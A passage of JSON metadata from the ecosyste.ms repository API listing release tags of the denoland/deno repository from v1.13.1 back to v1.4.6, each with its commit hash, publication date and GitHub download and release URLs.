cosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencie